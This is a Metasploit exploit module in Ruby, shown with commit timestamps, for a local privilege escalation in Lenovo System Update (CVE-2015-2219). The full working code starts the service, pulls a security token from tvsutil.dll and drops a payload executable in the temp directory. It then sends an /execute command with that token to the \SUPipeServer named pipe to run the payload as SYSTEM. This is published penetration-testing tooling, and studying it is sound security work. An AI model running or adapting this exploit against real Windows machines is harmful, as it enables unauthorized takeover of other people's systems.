metasploit-framework/modules/exploits/windows/local/lenovo_systemupdate.rb

194 lines
5.9 KiB
Ruby
Raw Normal View History

2015-05-14 22:36:03 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Local
2015-05-14 22:36:03 +00:00
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Services
2015-05-22 21:20:36 +00:00
Rank = ExcellentRanking
2015-05-14 22:36:03 +00:00
def initialize(info={})
super(update_info(info, {
'Name' => 'Lenovo System Update Privilege Escalation',
'Description' => %q{
2015-05-22 21:20:36 +00:00
The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
System update service. The service provides the possibility to execute arbitrary
commands as SYSTEM if a valid security token is provided. This token can be generated
by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
System Update is stopped by default but can be started/stopped calling the Executable
ConfigService.exe.
2015-05-14 22:36:03 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
2015-06-01 21:45:09 +00:00
'Michael Milvich', # vulnerability discovery, advisory
2015-05-22 21:20:36 +00:00
'Sofiane Talmat', # vulnerability discovery, advisory
'h0ng10' # Metasploit module
2015-05-14 22:36:03 +00:00
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows', { } ]
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'References' =>
[
['OSVDB', '121522'],
2015-05-14 22:36:03 +00:00
['CVE', '2015-2219'],
['URL', 'http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf']
],
'DisclosureDate' => 'Apr 12 2015',
'DefaultTarget' => 0
}))
register_options([
OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']),
OptInt.new('Sleep', [true, 'Time to sleep while service starts (seconds)', 4]),
], self.class)
end
def check
os = sysinfo['OS']
unless os =~ /windows/i
return Exploit::CheckCode::Safe
end
svc = service_info('SUService')
if svc && svc[:display] =~ /System Update/
vprint_good("Found service '#{svc[:display]}'")
return Exploit::CheckCode::Detected
2015-05-14 22:36:03 +00:00
else
return Exploit::CheckCode::Safe
end
end
def write_named_pipe(pipe, command)
invalid_handle_value = 0xFFFFFFFF
r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0)
handle = r['return']
if handle == invalid_handle_value
2015-05-15 04:35:55 +00:00
fail_with(Failure::NoTarget, "#{pipe} named pipe not found")
2015-05-14 22:36:03 +00:00
else
2015-05-15 04:35:55 +00:00
vprint_good("Opended #{pipe}! Proceeding...")
2015-05-14 22:36:03 +00:00
end
2015-05-17 18:48:11 +00:00
begin
2015-05-14 22:36:03 +00:00
2015-05-17 18:48:11 +00:00
# First, write the string length as Int32 value
w = client.railgun.kernel32.WriteFile(handle, [command.length].pack('l'), 4, 4, nil)
2015-05-14 22:36:03 +00:00
2015-05-17 18:48:11 +00:00
if w['return'] == false
print_error('The was an error writing to pipe, check permissions')
return false
end
2015-05-14 22:36:03 +00:00
2015-05-17 18:48:11 +00:00
# Then we send the real command
w = client.railgun.kernel32.WriteFile(handle, command, command.length, 4, nil)
2015-05-14 22:36:03 +00:00
2015-05-17 18:48:11 +00:00
if w['return'] == false
print_error('The was an error writing to pipe, check permissions')
return false
end
ensure
session.railgun.kernel32.CloseHandle(handle)
end
2015-05-14 22:36:03 +00:00
true
end
def get_security_token(lenovo_directory)
2015-05-22 21:20:36 +00:00
unless client.railgun.get_dll('tvsutil')
2015-05-14 22:36:03 +00:00
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
2015-06-01 21:45:36 +00:00
client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')
2015-05-14 22:36:03 +00:00
end
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
2015-05-22 21:20:36 +00:00
dll_response['systeminfo'][0,40]
2015-05-14 22:36:03 +00:00
end
def config_service(lenovo_directory, option)
2015-05-15 04:51:42 +00:00
cmd_exec("#{lenovo_directory}\\ConfigService.exe #{option}")
2015-05-14 22:36:03 +00:00
end
def exploit
if is_system?
fail_with(Failure::NoTarget, 'Session is already elevated')
end
2015-05-15 04:51:42 +00:00
su_directory = service_info('SUService')[:path][1..-16]
2015-05-22 21:20:36 +00:00
print_status('Starting service via ConfigService.exe')
config_service(su_directory, 'start')
print_status('Giving the service some time to start...')
Rex.sleep(datastore['Sleep'])
2015-05-14 22:36:03 +00:00
print_status("Getting security token...")
token = get_security_token(su_directory)
vprint_good("Security token is: #{token}")
2015-05-22 21:20:36 +00:00
if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
temp_dir = get_env('TEMP')
2015-05-22 21:20:36 +00:00
else
temp_dir = datastore['WritableDir']
2015-05-14 22:36:03 +00:00
end
2015-05-22 21:20:36 +00:00
print_status("Using #{temp_dir} to drop the payload")
2015-05-14 22:36:03 +00:00
begin
cd(temp_dir)
rescue Rex::Post::Meterpreter::RequestError
fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")
end
print_status('Writing malicious exe to remote filesystem')
write_path = pwd
exe_name = "#{rand_text_alpha(10 + rand(10))}.exe"
begin
write_file(exe_name, generate_payload_exe)
register_file_for_cleanup("#{write_path}\\#{exe_name}")
rescue Rex::Post::Meterpreter::RequestError
fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}")
end
print_status('Sending Execute command to update service')
begin
write_res = write_named_pipe("\\\\.\\pipe\\SUPipeServer", "/execute #{exe_name} /arguments /directory #{write_path} /type COMMAND /securitycode #{token}")
rescue Rex::Post::Meterpreter::RequestError
fail_with(Failure::Unknown, 'Failed to write to pipe')
end
unless write_res
fail_with(Failure::Unknown, 'Failed to write to pipe')
end
2015-05-22 21:20:36 +00:00
print_status('Stopping service via ConfigService.exe')
config_service(su_directory, 'stop')
2015-05-14 22:36:03 +00:00
end
end